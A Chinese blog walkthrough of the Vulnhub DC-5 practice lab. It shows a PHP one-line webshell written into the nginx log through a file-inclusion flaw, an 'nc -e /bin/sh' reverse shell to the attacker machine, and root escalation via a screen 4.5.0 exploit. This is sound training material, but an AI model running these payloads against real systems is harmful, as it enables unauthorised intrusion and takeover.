Vulnhub靶场----5、DC-5


一、环境搭建

DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip
kali:192.168.144.148
DC-5:192.168.144.153


二、渗透流程


1、信息收集

nmap -T5 -p- -sV -sT -A 192.168.144.15

思路:
开放端口是80、36888
访问web页面:
网站指纹探测、查看页面内容、目录枚举、网页源代码信息泄露;
……


2、探测网站内容

1.访问http://192.168.144.153,点击contact页面

2.burpsuite抓取请求包

3.路径存在文件包含


3、文件包含利用 获取权限

1.利用文件包含写入一句话木马

<?php eval($_POST['cmd']);?>


2.利用文件包含使上传的文件以PHP格式执行

用户输入数据,Nginx日志会记录用户输入,将木马或者命令写入Nginx日志,利用文件包含日志,就可以将用户输入以PHP格式执行

file=/var/log/nginx/error.log&cmd=ls


3.nc 反弹shell

file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.144.148 4444


4.使用python生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

4、提权

1.查找以root权限运行的组件

find / -perm -4000  2>/dev/null


2.寻找screen 4.5.0相关漏洞

searchsploit screen 4.5.0


3.漏洞利用

将漏洞利用脚本复制到当前目录

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

将如下内容写入libhax.c中,然后gcc编译:

vim libhax.c 
gcc -fPIC -shared -ldl -o libhax.so libhax.c

将如下内容写入rootshell.c中,然后gcc编译

vim rootshell.c
gcc -o rootshell rootshell.c

将如下内容写入dc5.sh

vim dc5.sh


4.获取root权限

将刚刚生成的文件通过蚁剑上传到/tmp目录

cd /tmp
chmod +x dc5.sh
ls -l
./dc5.sh
cd /root
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值